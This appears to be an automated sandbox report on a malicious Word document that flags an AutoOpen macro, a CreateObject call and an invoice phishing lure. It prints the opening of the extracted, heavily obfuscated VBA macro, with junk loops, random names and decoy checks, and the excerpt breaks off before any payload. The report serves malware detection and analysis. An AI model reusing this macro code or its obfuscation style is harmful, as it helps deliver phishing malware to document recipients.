MALICIOUS
Risk Score: 230
Malware Insights
MITRE ATT&CK
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
The sample contains a legacy WordBasic auto-exec macro named 'AutoOpen' which is triggered upon opening the document. This macro utilizes the CreateObject function, a common technique for executing arbitrary code. The ClamAV detection 'Doc.Macro.Obfuscated-6397052-2' further confirms its malicious nature. The presence of an embedded URL and invoice-related language suggests a phishing or social engineering lure.
Heuristics (8)
- ClamAV: Doc.Macro.Obfuscated-6397052-2 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Macro.Obfuscated-6397052-2
- VBA macros detected (medium, 3 related findings, OLE_VBA_MACROS): Document contains VBA macro code
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- CreateObject call (high, OLE_VBA_CREATEOBJ): CreateObject call
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Fake invoice / payment lure (low, SE_INVOICE_LURE): Document contains invoice or payment language paired with an action verb; useful context when combined with link, macro, or attachment indicators
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 533993 bytes |

SHA-256: 85d1c4337ef5473dd766ee7e63ccd2ee85119f654dda7b7d73cab47b4648d5c8

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "xCLhaz"
Public Function qmJ6CVz40oTI5UZ9(tQodRgoEc7i1TYH As String, Optional MpYj5p3iiZSyIt As Boolean = True) As String
Static ezsGZk0Q65uxLxb(0 To 255) As Byte
Dim BC4Aq1zuSivYth As Object
Dim nZ59hJAJyr1za1 As String
nZ59hJAJyr1za1 = Application.UserName
Dim HiGMJ5F9Ogj, wt3LRg09uKYZ9G As Integer
wt3LRg09uKYZ9G = Len(nZ59hJAJyr1za1)
Dim cCUmrDvS1vX As Collection
While wt3LRg09uKYZ9G > 1
HiGMJ5F9Ogj = HiGMJ5F9Ogj + 2
wt3LRg09uKYZ9G = wt3LRg09uKYZ9G - 5
Wend
Dim jhGnGeiGvneUu2 As Collection
Set jhGnGeiGvneUu2 = New Collection
jhGnGeiGvneUu2.Add "cCUmrDvS1vX"
jhGnGeiGvneUu2.Add "vl2ZCdNZlaz"
jhGnGeiGvneUu2.Add "fwx4JuGltgvPc1"
Dim aeB0C5oRRIg4o4, buXJXfTasTS As Integer
aeB0C5oRRIg4o4 = 9
buXJXfTasTS = 5
#If EDstaVuDXgN <> 0 Then
EDstaVuDXgN = EDstaVuDXgN + 8
Dim CsDXzKPhIJu As Variant
Else
Dim CsDXzKPhIJu As Object
#End If
If aeB0C5oRRIg4o4 > buXJXfTasTS Then
For Q8gQSbSJEvri72 = buXJXfTasTS To aeB0C5oRRIg4o4
buXJXfTasTS = buXJXfTasTS / aeB0C5oRRIg4o4
Next Q8gQSbSJEvri72
End If
Dim JJUtuNKCTvObbV As String
Dim IGf1mYuWSd5 As String
IGf1mYuWSd5 = hxlMbjA3kgZ
JJUtuNKCTvObbV = hILVqucFC53
If (StrComp(JJUtuNKCTvObbV, IGf1mYuWSd5, vbTextCompare) <> 0) Then
MsgBox ("Optional: Rf9e0gzby00yFX.")
End If
Dim sDi5eXlUwJl4I6, B4fc9TRSg1P As Integer
sDi5eXlUwJl4I6 = 1
B4fc9TRSg1P = 5
#If xvk2itXkzyy <> 0 Then
xvk2itXkzyy = xvk2itXkzyy + 3
Dim ATfULkkWIJf As Variant
Else
Dim ATfULkkWIJf As Object
#End If
If sDi5eXlUwJl4I6 > B4fc9TRSg1P Then
For SpgibVEQigrphl = B4fc9TRSg1P To sDi5eXlUwJl4I6
B4fc9TRSg1P = B4fc9TRSg1P / sDi5eXlUwJl4I6
Next SpgibVEQigrphl
End If
Dim GN3M6oHrsKsGbZ As Integer
Dim vW9RBfgQSTn As String
GN3M6oHrsKsGbZ = 9642
Dim ytLIW64xKOc As Integer
vW9RBfgQSTn = Right(CStr(GN3M6oHrsKsGbZ), 1)
ytLIW64xKOc = CInt(vW9RBfgQSTn)
For gWfr6jxV8jG = ytLIW64xKOc To 32
GN3M6oHrsKsGbZ = GN3M6oHrsKsGbZ + 3
Next gWfr6jxV8jG
Dim pvPqgJnEbR7FeFz5() As Byte, fWbtJENAZBErih() As Byte
Dim aPtGC4NrowGSp6 As String
Dim wbDN4htuqIPKLo As Object
Dim pxgzeNk8MdP5Wh As Integer
For Azqsxpr6jwQ = 8 To 82
pxgzeNk8MdP5Wh = Azqsxpr6jwQ
Next Azqsxpr6jwQ
Dim fpFMkPuHUCb9If, JxiyPHITWS6 As String
fpFMkPuHUCb9If = 7
JxiyPHITWS6 = 1
#If fpFMkPuHUCb9If > JxiyPHITWS6 Then
Dim CjjsID9Acwb As LongPtr
#Else
Dim CjjsID9Acwb As Integer
CjjsID9Acwb = 7 + 1
Dim RKKVnaEvX7F As Integer
For RKKVnaEvX7F = 0 To fpFMkPuHUCb9If
RKKVnaEvX7F = RKKVnaEvX7F + 1
Next RKKVnaEvX7F
#End If
Dim QfJSSzPhpKZM8b As String
Dim yqstdXo3esO As String
yqstdXo3esO = e4861j0T5qf
QfJSSzPhpKZM8b = PeIi4mqcB2z
If (StrComp(QfJSSzPhpKZM8b, yqstdXo3esO, vbTextCompare) <> 0) Then
MsgBox ("Optional: w8Z9QYaeZAbDs3.")
End If
Dim AtKfCupc8cL7tq, w5QE5RG9mf7 As Integer
AtKfCupc8cL7tq = 5
w5QE5RG9mf7 = 2
#If azKQyAWLPWD <> 0 Then
azKQyAWLPWD = azKQyAWLPWD + 2
Dim peeHo958FhH As Variant
Else
Dim peeHo958FhH As Object
#End If
If AtKfCupc8cL7tq > w5QE5RG9mf7 Then
For nfuX75kWBHphg7 = w5QE5RG9mf7 To AtKfCupc8cL7tq
w5QE5RG9mf7 = w5QE5RG9mf7 / AtKfCupc8cL7tq
Next nfuX75kWBHphg7
End If
Dim R2HwjymGDnaaYC, igaDal3U5I6 As Integer
R2HwjymGDnaaYC = 5
igaDal3U5I6 = 3
#If yKJzvgPuman <> 0 Then
yKJzvgPuman = yKJzvgPuman + 3
Dim glXH7P7dPHH As Variant
Else
Dim glXH7P7dPHH As Object
#End If
If R2HwjymGDnaaYC > igaDal3U5I6 Then
For v0qsZZLl968xln = igaDal3U5I6 To R2HwjymGDnaaYC
igaDal3U5I6 = igaDal3U5I6 / R2HwjymGDnaaYC
Next v0qsZZLl968xln
End If
Dim jdOBJoln2874Zxb As Long, ZSKJ9IYpGSsqPQeF5g As Long
Dim PHCH0jBaqnvwdd As Integer
Dim eoMhUloDvEHa5b As Integer
Dim jRsOemxnTQWpjj As Integer
Dim YhSc1QAbhj7 As String
jRsOemxnTQWpjj = 5531
Dim cbXM9KiUWP1 As Integer
YhSc1QAbhj7 = Right(CStr(jRsOemxnTQWpjj), 1)
cbXM9KiUWP1 = CInt(YhSc1QAbhj7)
For quR6SNPO1Fc = cbXM9KiUWP1 To 23
jRsOemxnTQWpjj =
... (truncated)